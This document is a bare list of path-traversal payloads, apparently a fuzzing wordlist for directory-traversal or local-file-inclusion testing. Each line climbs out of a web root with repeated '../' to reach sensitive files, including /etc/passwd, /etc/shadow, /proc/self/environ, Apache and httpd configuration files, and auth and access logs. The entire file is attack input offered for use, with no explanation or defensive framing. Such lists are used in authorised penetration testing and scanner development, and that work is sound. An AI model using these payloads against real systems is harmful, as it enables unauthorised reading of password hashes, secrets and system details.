../../../../../../../../etc/passwd
../../../../../../../../windows/win.ini
../../../../../../../../etc/shadow
../../../../../../../../etc/group
../../../../../../../../etc/hosts
../../../../../../../../etc/motd
../../../../../../../../etc/issue
../../../../../../../../etc/bashrc
../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../proc/self/environ
../../../../../../../../proc/version
../../../../../../../../proc/cmdline
../../../../../../../../proc/sched_debug
../../../../../../../../proc/mounts
../../../../../../../../proc/net/arp
../../../../../../../../proc/net/route
../../../../../../../../proc/net/tcp
../../../../../../../../proc/net/udp
../../../../../../../../var/log/apache2/access.log
../../../../../../../../var/log/apache2/error.log
../../../../../../../../var/log/httpd/access_log
../../../../../../../../var/log/httpd/error_log
../../../../../../../../var/log/auth.log
../../../../../../../../var/log/dmesg
